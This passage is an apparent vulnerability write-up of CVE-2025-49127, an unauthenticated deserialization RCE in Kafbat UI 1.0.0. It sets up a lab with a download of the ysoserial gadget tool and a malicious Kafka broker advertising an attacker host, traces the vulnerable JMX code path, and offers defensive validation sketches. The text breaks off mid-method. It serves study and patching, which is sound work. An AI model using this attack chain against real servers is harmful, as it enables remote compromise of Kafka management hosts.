CVE-2025-49127 is a critical remote code execution vulnerability affecting Kafbat UI version 1.0.0. This vulnerability allows any unauthenticated user to execute arbitrary code on the server through unsafe deserialization when connecting to malicious JMX services. The issue stems from the application’s dynamic cluster configuration functionality that accepts user-provided JMX endpoints without proper validation, leading to unsafe deserialization attacks when the application attempts to connect to attacker-controlled JMX servers.
CVE Details:
- CVE ID: CVE-2025-49127
- CVSS Score: Critical
- Affected Version: Kafbat UI 1.0.0
- Fixed Version: 1.1.0
- Vulnerability Type: Unsafe Deserialization / Remote Code Execution
- Attack Vector: Network
- Authentication Required: None
What is Kafbat UI?
Kafbat UI is a web-based user interface designed for managing Apache Kafka clusters. It provides administrators with an intuitive dashboard to monitor, configure, and manage Kafka environments. The application offers several key features:
- Cluster Management: Dynamic addition and configuration of Kafka clusters
- Metrics Collection: Integration with JMX and Prometheus for monitoring broker performance
- Topic Management: Creation, deletion, and configuration of Kafka topics
- Consumer Group Monitoring: Real-time tracking of consumer group offsets and lag
- Schema Registry Integration: Management of Avro, JSON, and Protobuf schemas
- Connect Cluster Management: Integration with Kafka Connect for connector management
The application supports dynamic configuration changes, allowing administrators to add new clusters and modify settings without requiring application restarts. This flexibility, while convenient, introduces the security vulnerability when combined with unsafe JMX connections.
Lab Setup
To reproduce this vulnerability, we need to set up a vulnerable Kafbat UI environment and create the malicious infrastructure for exploitation.
Step 1: Prepare the Environment
# Create working directory
mkdir kafbat-ui-cve-lab
cd kafbat-ui-cve-lab
# Download the modified ysoserial tool
wget https://github.com/trganda/ysoserial/releases/download/v0.0.6/ysoserial-0.0.6-all.jar
# Create scripts directory
mkdir scripts
Step 2: Create the Docker Compose Configuration
Create a docker-compose.yml file with the vulnerable setup:
version: '3.8'
name: "kafbat-ui-cve-lab"
services:
  zookeeper:
    image: 'confluentinc/cp-zookeeper:7.6.1'
    environment:
      ZOOKEEPER_CLIENT_PORT: 2181
  kafbat-ui:
    container_name: kafbat-ui
    image: ghcr.io/kafbat/kafka-ui:v1.0.0 # Vulnerable version
    ports:
      - 8080:8080
      - 5005:5005
    depends_on:
      - kafka0
    environment:
      KAFKA_CLUSTERS_0_NAME: local
      KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka0:29092
      KAFKA_CLUSTERS_0_METRICS_PORT: 9997
      DYNAMIC_CONFIG_ENABLED: 'true' # Enable dynamic configuration
      JAVA_TOOL_OPTIONS: '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005'
  kafka0:
    image: confluentinc/cp-kafka:7.2.1
    hostname: kafka0
    container_name: kafka0
    ports:
      - 9092:9092
      - 9997:9997
    environment:
      KAFKA_BROKER_ID: 1
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,CONTROLLER:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka0:29092,PLAINTEXT_HOST://localhost:9092
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
      KAFKA_GROUP_INITIAL_REBALANCE_DELAY_MS: 0
      KAFKA_TRANSACTION_STATE_LOG_MIN_ISR: 1
      KAFKA_TRANSACTION_STATE_LOG_REPLICATION_FACTOR: 1
      KAFKA_PROCESS_ROLES: 'broker,controller'
      KAFKA_NODE_ID: 1
      KAFKA_CONTROLLER_QUORUM_VOTERS: '1@kafka0:29093'
      KAFKA_LISTENERS: 'PLAINTEXT://kafka0:29092,CONTROLLER://kafka0:29093,PLAINTEXT_HOST://0.0.0.0:9092'
      KAFKA_CONTROLLER_LISTENER_NAMES: 'CONTROLLER'
      KAFKA_LOG_DIRS: '/tmp/kraft-combined-logs'
      KAFKA_JMX_PORT: 9997
      KAFKA_JMX_OPTS: -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=kafka0 -Dcom.sun.management.jmxremote.rmi.port=9997
  # Malicious Kafka broker that advertises evil JMX endpoint
  kafka-malicious-broker:
    image: 'confluentinc/cp-kafka:7.2.1'
    depends_on:
      - zookeeper
    ports:
      - 9093:9093
    environment:
      KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181'
      # Replace with your actual host IP - this is where the malicious JMX server will run
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://YOUR_HOST_IP:9093
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
Step 3: Start the Environment
# Replace YOUR_HOST_IP with your actual host IP (192.168.1.100 below is only an example)
sed -i 's/YOUR_HOST_IP/192.168.1.100/g' docker-compose.yml
# Start the environment
docker-compose up -d
# Verify services are running
docker-compose ps
Step 4: Verify Kafbat UI Access
Navigate to http://localhost:8080 to ensure Kafbat UI is running and accessible.
The Analysis
The vulnerability in CVE-2025-49127 represents a sophisticated multi-layered security flaw that exploits the dynamic configuration capabilities of Kafbat UI through unsafe Java deserialization in JMX connections. The attack leverages the application’s legitimate metrics collection functionality to establish connections to attacker-controlled JMX servers, which then return malicious serialized objects that execute arbitrary code when deserialized by the client application.

The vulnerability originates in the ApplicationConfigController class, which handles dynamic configuration changes through the /api/config REST endpoint. The validateConfig method begins by constructing an access context using AccessContext.builder().applicationConfigActions(EDIT).operationName("validateConfig").build(), which is intended to enforce role-based access control. That check offers no protection when authentication is disabled through auth.type: DISABLED, as is often the case in default configurations, because the security mechanism is then effectively bypassed. The method next processes the incoming configuration inside configDto.flatMap(config -> { ... }), where the mapping operation DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties()) converts user-provided input directly into internal data structures without any sanitization or validation of the cluster configuration contents.
ApplicationConfigController.java – validateConfig method:
@Override
public Mono<ResponseEntity<ApplicationConfigValidationDTO>> validateConfig(Mono<ApplicationConfigDTO> configDto,
ServerWebExchange exchange) {
// ISSUE 1: Access control bypass potential
var context = AccessContext.builder()
.applicationConfigActions(EDIT) // Requires EDIT permission
.operationName("validateConfig")
.build();
return validateAccess(context) // RBAC check happens here
.then(configDto) // Process incoming configuration
.flatMap(config -> {
// ISSUE 2: Unsafe mapping from DTO without sanitization
DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties());
ClustersProperties clustersProperties = newConfig.getKafka();
// CRITICAL: This triggers the vulnerable validation chain
return validateClustersConfig(clustersProperties)
.map(validations -> new ApplicationConfigValidationDTO().clusters(validations));
})
.map(ResponseEntity::ok)
.doOnEach(sig -> audit(context, sig)); // Audit after potential exploitation
}
The most critical aspect of this vulnerability lies in the subsequent call to validateClustersConfig(clustersProperties), which triggers a validation chain that has the dangerous side effect of initiating actual connections to user-specified endpoints. This validation process is fundamentally flawed because it treats validation as an active operation rather than a passive check, meaning that simply submitting a malicious configuration can trigger the exploitation regardless of whether the configuration is ultimately accepted or rejected by the system. The configuration persistence mechanism reveals additional security flaws in the restartWithConfig method, where malicious configurations are written directly to disk through dynamicConfigOperations.persist(newConfig) without deep validation, and the system automatically restarts with restarter.requestRestart(), loading the malicious configuration system-wide and creating a persistent attack vector.
ApplicationConfigController.java – restartWithConfig method:
@Override
public Mono<ResponseEntity<Void>> restartWithConfig(Mono<RestartRequestDTO> restartRequestDto,
ServerWebExchange exchange) {
var context = AccessContext.builder()
.applicationConfigActions(EDIT)
.operationName("restartWithConfig")
.build();
return validateAccess(context)
.then(restartRequestDto)
.doOnNext(restartDto -> {
// ISSUE 3: Configuration persisted without deep validation
var newConfig = MAPPER.fromDto(restartDto.getConfig().getProperties());
dynamicConfigOperations.persist(newConfig); // Writes malicious config to disk
})
.doOnEach(sig -> audit(context, sig))
.doOnSuccess(dto -> restarter.requestRestart()) // ISSUE 4: Triggers app restart with malicious config
.map(dto -> ResponseEntity.ok().build());
}
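One way to keep validation passive is to check submitted endpoints syntactically and against an operator-defined allowlist before any socket is opened. The following is a minimal sketch under stated assumptions: PassiveEndpointCheck, its check method, and the allowlist are hypothetical names introduced for illustration and are not part of Kafbat UI. IPv6 literals are not handled.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;

// Hypothetical helper: inspects a bootstrapServers string without any network I/O.
final class PassiveEndpointCheck {

    /** Returns human-readable problems; an empty list means the value passed. */
    static List<String> check(String bootstrapServers, Set<String> allowedHosts) {
        List<String> problems = new ArrayList<>();
        if (bootstrapServers == null || bootstrapServers.isBlank()) {
            problems.add("bootstrapServers is empty");
            return problems;
        }
        for (String entry : bootstrapServers.split(",")) {
            String trimmed = entry.trim();
            int colon = trimmed.lastIndexOf(':');
            if (colon <= 0 || colon == trimmed.length() - 1) {
                problems.add("not in host:port form: " + trimmed);
                continue;
            }
            String host = trimmed.substring(0, colon);
            int port;
            try {
                port = Integer.parseInt(trimmed.substring(colon + 1));
            } catch (NumberFormatException e) {
                problems.add("port is not a number: " + trimmed);
                continue;
            }
            if (port < 1 || port > 65535) {
                problems.add("port out of range: " + trimmed);
            }
            // The allowlist is assumed to hold lower-case host names chosen by the operator.
            if (!allowedHosts.contains(host.toLowerCase(Locale.ROOT))) {
                problems.add("host not on allowlist: " + host);
            }
        }
        return problems;
    }

    public static void main(String[] args) {
        Set<String> allowed = Set.of("kafka0");
        System.out.println(check("kafka0:29092", allowed));
        System.out.println(check("192.168.1.100:9093", allowed));
    }
}
```

Because the check never connects anywhere, submitting a hostile configuration to it cannot trigger the connection chain described above; any active probe would run only after the list of problems comes back empty.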
Moving deeper into the configuration processing layer, the DynamicConfigOperations class reveals additional security weaknesses in how configurations are persisted and loaded. The persist method begins with a call to checkIfDynamicConfigEnabled(), which only verifies that the dynamic configuration feature is enabled but performs no content validation. The method then calls properties.initAndValidate(), but examining the implementation of this validation reveals that it only performs basic structural validation through ClustersProperties::validateAndSetDefaults and does not inspect the actual values being configured, particularly the JMX endpoint specifications that are central to this vulnerability.
DynamicConfigOperations.java – persist method:
public void persist(PropertiesStructure properties) {
checkIfDynamicConfigEnabled(); // Only checks if feature is enabled
properties.initAndValidate(); // ISSUE: Insufficient validation
String yaml = serializeToYaml(properties); // Serializes malicious config
writeYamlToFile(yaml, dynamicConfigFilePath()); // Writes to disk without deep inspection
}
The persistence mechanism itself introduces additional security risks through the writeYamlToFile method, which serializes the malicious configuration using String yaml = serializeToYaml(properties) and writes it directly to disk with Files.writeString(path, yaml, StandardOpenOption.CREATE, StandardOpenOption.WRITE, StandardOpenOption.TRUNCATE_EXISTING). This operation occurs without any deep content inspection or validation of the YAML structure, meaning that malicious JMX configurations become permanently stored on the filesystem.
DynamicConfigOperations.java – writeYamlToFile method:
@SneakyThrows
private void writeYamlToFile(String yaml, Path path) {
// ISSUE: No content validation of YAML before writing
if (Files.isDirectory(path)) {
throw new ValidationException("Dynamic file path is a directory, but should be a file path");
}
if (!Files.exists(path.getParent())) {
Files.createDirectories(path.getParent());
}
if (Files.exists(path) && !Files.isWritable(path)) {
throw new ValidationException("File already exists and is not writable");
}
try {
Files.writeString(path, yaml, // VULNERABLE: Writes malicious YAML
StandardOpenOption.CREATE,
StandardOpenOption.WRITE,
StandardOpenOption.TRUNCATE_EXISTING
);
} catch (IOException e) {
throw new ValidationException("Error writing to " + path, e);
}
}
The configuration loading process compounds this issue through the loadDynamicPropertySource method, which automatically loads these potentially malicious configurations at application startup using new YamlPropertySourceLoader().load("dynamicProperties", new FileSystemResource(configPath)), creating a persistent attack vector that survives application restarts.
DynamicConfigOperations.java – loadDynamicPropertySource method:
@SneakyThrows
public Optional<PropertySource<?>> loadDynamicPropertySource() {
if (dynamicConfigEnabled()) {
Path configPath = dynamicConfigFilePath();
if (!Files.exists(configPath) || !Files.isReadable(configPath)) {
log.warn("Dynamic config file {} doesnt exist or not readable", configPath);
return Optional.empty();
}
var propertySource = new CompositePropertySource("dynamicProperties");
new YamlPropertySourceLoader()
.load("dynamicProperties", new FileSystemResource(configPath)) // VULNERABLE: Loads malicious YAML
.forEach(propertySource::addPropertySource);
log.info("Dynamic config loaded from {}", configPath);
return Optional.of(propertySource);
}
return Optional.empty();
}
The KafkaClusterFactory class demonstrates another critical vulnerability in the cluster creation process. The create method constructs cluster objects directly from user-provided configuration properties without validation, particularly in how it handles metrics configuration through metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()). This method creates a MetricsConfig object where both the type and port are directly copied from user input using builder.type(metricsConfigData.getType()) and builder.port(metricsConfigData.getPort()), with no validation to ensure these values are safe or reasonable. The type field accepts “JMX” without question, which triggers the vulnerable code path, while the port field accepts any integer value specified by the attacker.
KafkaClusterFactory.java – create method:
public KafkaCluster create(ClustersProperties properties,
ClustersProperties.Cluster clusterProperties) {
KafkaCluster.KafkaClusterBuilder builder = KafkaCluster.builder();
builder.name(clusterProperties.getName());
builder.bootstrapServers(clusterProperties.getBootstrapServers()); // User-controlled
builder.properties(convertProperties(clusterProperties.getProperties()));
builder.readOnly(clusterProperties.isReadOnly());
// ... other configurations ...
if (metricsConfigured(clusterProperties)) {
// CRITICAL: Creates metrics config from user input without validation
builder.metricsConfig(metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()));
}
builder.originalProperties(clusterProperties); // Preserves original malicious config
return builder.build();
}
KafkaClusterFactory.java – metricsConfigDataToMetricsConfig method:
@Nullable
private MetricsConfig metricsConfigDataToMetricsConfig(ClustersProperties.MetricsConfigData metricsConfigData) {
if (metricsConfigData == null) {
return null;
}
MetricsConfig.MetricsConfigBuilder builder = MetricsConfig.builder();
builder.type(metricsConfigData.getType()); // ISSUE: Type not validated ("JMX" accepted)
builder.port(metricsConfigData.getPort()); // ISSUE: Port not validated (attacker-controlled)
builder.ssl(Optional.ofNullable(metricsConfigData.getSsl()).orElse(false));
builder.username(metricsConfigData.getUsername()); // Can be null
builder.password(metricsConfigData.getPassword()); // Can be null
builder.keystoreLocation(metricsConfigData.getKeystoreLocation());
builder.keystorePassword(metricsConfigData.getKeystorePassword());
return builder.build();
}
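The missing checks on type and port can be pictured as a small validation step that runs before the MetricsConfig is built. This is an illustrative sketch only: MetricsConfigCheck and validate are hypothetical names, the set of accepted type strings is an assumption, and requiring an explicit type is a design choice of this sketch rather than documented Kafbat UI behavior.

```java
import java.util.Locale;
import java.util.Optional;
import java.util.Set;

// Hypothetical validator for the two attacker-influenced metrics fields.
final class MetricsConfigCheck {

    // Assumed set of supported metrics types.
    private static final Set<String> KNOWN_TYPES = Set.of("JMX", "PROMETHEUS");

    /** Returns an error message, or Optional.empty() when both fields look sane. */
    static Optional<String> validate(String type, Integer port) {
        if (type == null || !KNOWN_TYPES.contains(type.toUpperCase(Locale.ROOT))) {
            return Optional.of("metrics.type must be set explicitly to a supported value");
        }
        if (port == null) {
            return Optional.of("metrics.port is required");
        }
        if (port < 1 || port > 65535) {
            return Optional.of("metrics.port must be between 1 and 65535");
        }
        return Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(validate("JMX", 9997).isPresent());
        System.out.println(validate(null, 9997).isPresent());
    }
}
```

A range check like this does not decide whether a given host is trustworthy; it only removes obviously malformed input and forces the operator to choose JMX deliberately.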
Perhaps most critically, the cluster validation process in the validate method completely fails to validate JMX endpoints. While the method performs validation for Kafka connections, Schema Registry, KSQL, and Connect endpoints through respective validation calls, there is no corresponding validation for JMX metrics endpoints. This represents a fundamental design flaw where the application validates most external connections but completely ignores the security implications of JMX connections, allowing malicious JMX configurations to pass validation unconditionally.
KafkaClusterFactory.java – validate method:
public Mono<ClusterConfigValidationDTO> validate(ClustersProperties.Cluster clusterProperties) {
// SSL validation - not related to JMX vulnerability
if (clusterProperties.getSsl() != null) {
Optional<String> errMsg = KafkaServicesValidation.validateTruststore(clusterProperties.getSsl());
if (errMsg.isPresent()) {
return Mono.just(new ClusterConfigValidationDTO()
.kafka(new ApplicationPropertyValidationDTO()
.error(true)
.errorMessage("Truststore not valid: " + errMsg.get())));
}
}
return Mono.zip(
// Validates Kafka connection - NOT JMX
KafkaServicesValidation.validateClusterConnection(
clusterProperties.getBootstrapServers(),
convertProperties(clusterProperties.getProperties()),
clusterProperties.getSsl()
),
// Schema Registry validation (not JMX related)
schemaRegistryConfigured(clusterProperties)
? KafkaServicesValidation.validateSchemaRegistry(() -> schemaRegistryClient(clusterProperties)).map(Optional::of)
: Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),
// KSQL validation (not JMX related)
ksqlConfigured(clusterProperties)
? KafkaServicesValidation.validateKsql(() -> ksqlClient(clusterProperties)).map(Optional::of)
: Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),
// Connect validation (not JMX related)
connectClientsConfigured(clusterProperties) ?
Flux.fromIterable(clusterProperties.getKafkaConnect())
.flatMap(c -> KafkaServicesValidation.validateConnect(() -> connectClient(clusterProperties, c))
.map(r -> Tuples.of(c.getName(), r)))
.collectMap(Tuple2::getT1, Tuple2::getT2)
.map(Optional::of)
: Mono.<Optional<Map<String, ApplicationPropertyValidationDTO>>>just(Optional.empty())
).map(tuple -> {
var validation = new ClusterConfigValidationDTO();
validation.kafka(tuple.getT1());
tuple.getT2().ifPresent(validation::schemaRegistry);
tuple.getT3().ifPresent(validation::ksqldb);
tuple.getT4().ifPresent(validation::kafkaConnects);
return validation;
// CRITICAL OBSERVATION: NO JMX VALIDATION PERFORMED!
});
}
The vulnerability is triggered automatically through the ClustersStatisticsScheduler, which contains a scheduled method annotated with @Scheduled(fixedRateString = "${kafka.update-metrics-rate-millis:30000}") that executes every 30 seconds by default. This scheduler iterates through all configured clusters using Flux.fromIterable(clustersStorage.getKafkaClusters()) and calls statisticsService.updateCache(cluster) for each one, including any malicious clusters that have been configured. The use of .parallel().runOn(Schedulers.parallel()) means that multiple clusters are processed concurrently, and the final .block() call makes the scheduled method wait until every cluster has been processed. As a result, a hostile endpoint is contacted on every cycle without user interaction, and a slow or misbehaving endpoint can delay the refresh for the other clusters.
ClustersStatisticsScheduler.java – updateStatistics method:
@Scheduled(fixedRateString = "${kafka.update-metrics-rate-millis:30000}")
public void updateStatistics() {
Flux.fromIterable(clustersStorage.getKafkaClusters()) // Includes malicious clusters
.parallel()
.runOn(Schedulers.parallel())
.flatMap(cluster -> {
log.debug("Start getting metrics for kafkaCluster: {}", cluster.getName());
return statisticsService.updateCache(cluster) // TRIGGERS VULNERABILITY
.doOnSuccess(m -> log.debug("Metrics updated for cluster: {}", cluster.getName()));
})
.then()
.block(); // Synchronous execution
}
The StatisticsService orchestrates the metrics collection process through its getStatistics method, which includes a call to metricsCollector.getBrokerMetrics(cluster, description.getNodes()) as part of a larger Mono.zip operation. This call occurs within the normal application flow and is not treated as a potentially dangerous operation, meaning there are no additional security measures or safeguards applied. The method retrieves broker nodes from the Kafka cluster description and passes them directly to the metrics collector, which then attempts to collect metrics from each node using the configured JMX settings.
StatisticsService.java – getStatistics method:
private Mono<Statistics> getStatistics(KafkaCluster cluster) {
return adminClientService.get(cluster).flatMap(ac ->
ac.describeCluster().flatMap(description ->
ac.updateInternalStats(description.getController()).then(
Mono.zip(
List.of(
metricsCollector.getBrokerMetrics(cluster, description.getNodes()), // VULNERABLE CALL
getLogDirInfo(description, ac),
featureService.getAvailableFeatures(ac, cluster, description),
loadTopicConfigs(cluster),
describeTopics(cluster)),
results ->
Statistics.builder()
.status(ServerStatusDTO.ONLINE)
.clusterDescription(description)
.version(ac.getVersion())
.metrics((Metrics) results[0]) // Contains exploited metrics
.logDirInfo((InternalLogDirStats) results[1])
.features((List<ClusterFeature>) results[2])
.topicConfigs((Map<String, List<ConfigEntry>>) results[3])
.topicDescriptions((Map<String, TopicDescription>) results[4])
.build()
))))
.doOnError(e -> log.error("Failed to collect cluster {} info", cluster.getName(), e))
.onErrorResume(e -> Mono.just(Statistics.empty().toBuilder().lastKafkaException(e).build()));
}
The MetricsCollector class contains the logic that determines whether to use JMX or Prometheus for metrics collection. In the getMetrics method, the decision is made through a simple type check: if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)), which reveals that JMX is the default choice when no type is specified or when explicitly set to “JMX”. This default behavior is dangerous because it means that any cluster configuration that includes metrics settings will attempt JMX connections unless explicitly configured otherwise. The method then makes a direct call to jmxMetricsRetriever.retrieve(kafkaCluster, node), which initiates the vulnerable connection process.
MetricsCollector.java – getBrokerMetrics and getMetrics methods:
public Mono<Metrics> getBrokerMetrics(KafkaCluster cluster, Collection<Node> nodes) {
return Flux.fromIterable(nodes)
.flatMap(n -> getMetrics(cluster, n).map(lst -> Tuples.of(n, lst))) // VULNERABLE: Processes each node
.collectMap(Tuple2::getT1, Tuple2::getT2)
.map(nodeMetrics -> collectMetrics(cluster, nodeMetrics))
.defaultIfEmpty(Metrics.empty());
}
private Mono<List<RawMetric>> getMetrics(KafkaCluster kafkaCluster, Node node) {
Flux<RawMetric> metricFlux = Flux.empty();
if (kafkaCluster.getMetricsConfig() != null) {
String type = kafkaCluster.getMetricsConfig().getType();
// CRITICAL: JMX type triggers vulnerable code path
if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)) {
metricFlux = jmxMetricsRetriever.retrieve(kafkaCluster, node); // VULNERABLE CALL
} else if (type.equalsIgnoreCase(MetricsConfig.PROMETHEUS_METRICS_TYPE)) {
metricFlux = prometheusMetricsRetriever.retrieve(kafkaCluster, node);
}
}
return metricFlux.collectList();
}
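The branch logic in getMetrics can be isolated as a pure function to make the default visible. In this sketch, MetricsTypeDispatch, Retriever, and select are hypothetical names; the condition mirrors the listing above, and the string value assumed for PROMETHEUS_METRICS_TYPE is a guess that should be checked against the real MetricsConfig class.

```java
// Hypothetical stand-in that reproduces only the type check from getMetrics.
final class MetricsTypeDispatch {

    enum Retriever { JMX, PROMETHEUS, NONE }

    static final String JMX_METRICS_TYPE = "JMX";
    static final String PROMETHEUS_METRICS_TYPE = "PROMETHEUS"; // assumed value

    static Retriever select(boolean metricsConfigured, String type) {
        if (!metricsConfigured) {
            return Retriever.NONE; // no metrics block, nothing is contacted
        }
        // Same condition as the listing: a missing type falls through to JMX.
        if (type == null || type.equalsIgnoreCase(JMX_METRICS_TYPE)) {
            return Retriever.JMX;
        }
        if (type.equalsIgnoreCase(PROMETHEUS_METRICS_TYPE)) {
            return Retriever.PROMETHEUS;
        }
        return Retriever.NONE; // unknown type, empty metric list
    }

    public static void main(String[] args) {
        System.out.println(select(true, null));
        System.out.println(select(true, "prometheus"));
    }
}
```

Calling select(true, null) yields JMX, which is the behavior the paragraph above describes: a metrics block with only a port is enough to reach the JMX retriever.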
The core of the vulnerability resides in the JmxMetricsRetriever class, specifically in the retrieveSync method. This method performs unsafe string concatenation to construct the JMX URL using String jmxUrl = JMX_URL + node.host() + ":" + c.getMetricsConfig().getPort() + "/" + JMX_SERVICE_TYPE. Breaking down this construction reveals the security flaw: JMX_URL is the constant "service:jmx:rmi:///jndi/rmi://"; node.host() is the broker host reported in the cluster description, which the attacker controls by pointing the bootstrap servers configuration at a broker that advertises a host of their choosing; c.getMetricsConfig().getPort() comes from the user-controlled metrics port configuration; and JMX_SERVICE_TYPE is the constant "jmxrmi". This results in a URL like "service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi" where both the host and port are completely controlled by the attacker.
JmxMetricsRetriever.java – retrieveSync method:
@SneakyThrows
private List<RawMetric> retrieveSync(KafkaCluster c, Node node) {
// VULNERABILITY 1: Unsafe string concatenation with user-controlled input
String jmxUrl = JMX_URL + node.host() + ":" + c.getMetricsConfig().getPort() + "/" + JMX_SERVICE_TYPE;
/*
* Breaking down the URL construction:
* - JMX_URL = "service:jmx:rmi:///jndi/rmi://" (constant)
* - node.host() = USER CONTROLLED via bootstrapServers config
* - c.getMetricsConfig().getPort() = USER CONTROLLED via metrics.port config
* - JMX_SERVICE_TYPE = "jmxrmi" (constant)
*
* Result: service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi
*/
log.debug("Collection JMX metrics for {}", jmxUrl);
List<RawMetric> result = new ArrayList<>();
// VULNERABILITY 2: Connects to attacker-controlled endpoint
withJmxConnector(jmxUrl, c, jmxConnector -> getMetricsFromJmx(jmxConnector, result));
log.debug("{} metrics collected for {}", result.size(), jmxUrl);
return result;
}
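The concatenation can be reproduced in isolation to show how the two attacker-influenced values end up in the final URL. The constants below are copied from the breakdown above; JmxUrlSketch, buildJmxUrl, isPlainHost, and the host pattern are hypothetical and only illustrate a syntactic guard, assuming plain host names or IPv4 literals.

```java
import java.util.regex.Pattern;

// Hypothetical reproduction of the URL construction, plus a syntactic host guard.
final class JmxUrlSketch {

    static final String JMX_URL = "service:jmx:rmi:///jndi/rmi://";
    static final String JMX_SERVICE_TYPE = "jmxrmi";

    // Assumed conservative pattern: letters, digits, dots, and hyphens only.
    private static final Pattern PLAIN_HOST =
        Pattern.compile("^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$");

    static String buildJmxUrl(String host, int port) {
        return JMX_URL + host + ":" + port + "/" + JMX_SERVICE_TYPE;
    }

    /** True when the host contains no characters that could alter the URL structure. */
    static boolean isPlainHost(String host) {
        return host != null && PLAIN_HOST.matcher(host).matches();
    }

    public static void main(String[] args) {
        System.out.println(buildJmxUrl("192.168.1.100", 1718));
        System.out.println(isPlainHost("evil.example/extra"));
    }
}
```

A guard such as isPlainHost only prevents characters like "/" from reshaping the URL. It does nothing about a well-formed host that belongs to an attacker, so it would need to be combined with an allowlist or a deserialization filter.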
The actual connection attempt occurs in the withJmxConnector method, which first prepares the connection environment through prepareJmxEnvAndSetThreadLocal(c) and then creates a JMX connector using JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env). The critical vulnerability is triggered when the code calls connector.connect(env), which initiates an RMI handshake with the attacker-controlled server. This connection process is where the unsafe deserialization occurs, as the JMX protocol inherently uses Java serialization for communication between client and server.
JmxMetricsRetriever.java – withJmxConnector method:
private void withJmxConnector(String jmxUrl,
KafkaCluster c,
Consumer<JMXConnector> consumer) {
var env = prepareJmxEnvAndSetThreadLocal(c); // Prepare connection environment
try (JMXConnector connector = JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env)) {
try {
// VULNERABILITY 3: Unsafe connection to attacker endpoint
connector.connect(env);
/*
* This is where the deserialization vulnerability is triggered:
* 1. JMXConnector.connect() initiates RMI handshake
* 2. RMI protocol uses Java serialization for object exchange
* 3. Malicious JMX server returns crafted serialized objects
* 4. Client-side deserialization occurs without filtering
* 5. Gadget chains (e.g., CommonsCollections) execute arbitrary code
*/
} catch (Exception exception) {
log.error("Error connecting to {}", jmxUrl, exception);
return; // Early return on connection failure
}
consumer.accept(connector); // Process successful connection
} catch (Exception e) {
log.error("Error getting jmx metrics from {}", jmxUrl, e);
} finally {
JmxSslSocketFactory.clearThreadLocalContext(); // Clean up SSL context
}
}
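The phrase "deserialization occurs without filtering" refers to the absence of a serialization filter (java.io.ObjectInputFilter, available since Java 9). The sketch below shows on a local stream what an allowlist pattern does; SerialFilterSketch, NotAllowlisted, and the pattern string are hypothetical, and this is not necessarily how Kafbat UI 1.1.0 addresses the issue.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;
import java.util.ArrayList;

// Hypothetical demo of an allowlist-style serialization filter on a local stream.
final class SerialFilterSketch {

    // Assumed pattern: allow classes in java.lang and java.util, reject everything else.
    static final String ALLOW_JDK_BASICS = "java.lang.*;java.util.*;!*";

    // Stand-in for any class that is not on the allowlist.
    static final class NotAllowlisted implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    static byte[] serialize(Serializable value) {
        try (ByteArrayOutputStream bytes = new ByteArrayOutputStream();
             ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(value);
            out.flush();
            return bytes.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    /** Returns true if the stream deserializes under the filter, false if it is rejected. */
    static boolean passesFilter(byte[] data, String pattern) {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(pattern);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(filter);
            in.readObject();
            return true;
        } catch (InvalidClassException rejected) {
            return false; // the filter refused a class in the stream
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        ArrayList<String> harmless = new ArrayList<>();
        harmless.add("metric");
        System.out.println(passesFilter(serialize(harmless), ALLOW_JDK_BASICS));
        System.out.println(passesFilter(serialize(new NotAllowlisted()), ALLOW_JDK_BASICS));
    }
}
```

The same pattern syntax can be supplied process-wide through the jdk.serialFilter system property. Whether a given pattern is strict enough for JMX traffic while still letting legitimate metrics through would need testing against a real broker.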
During the RMI handshake and subsequent JMX operations, multiple deserialization points exist where malicious objects can be injected. The initial connection handshake involves object exchange between client and server, where the server can return crafted serialized objects that trigger deserialization on the client side. Additional deserialization occurs during MBean operations when the code calls msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null) to query for MBeans matching “kafka.server*:*”, and when individual attributes are retrieved through msc.getAttribute(objectName, attrNames[i].getName()). Each of these operations involves serialization and deserialization of Java objects, providing multiple opportunities for exploitation.
JmxMetricsRetriever.java – getMetricsFromJmx method:
@SneakyThrows
private void getMetricsFromJmx(JMXConnector jmxConnector, List<RawMetric> sink) {
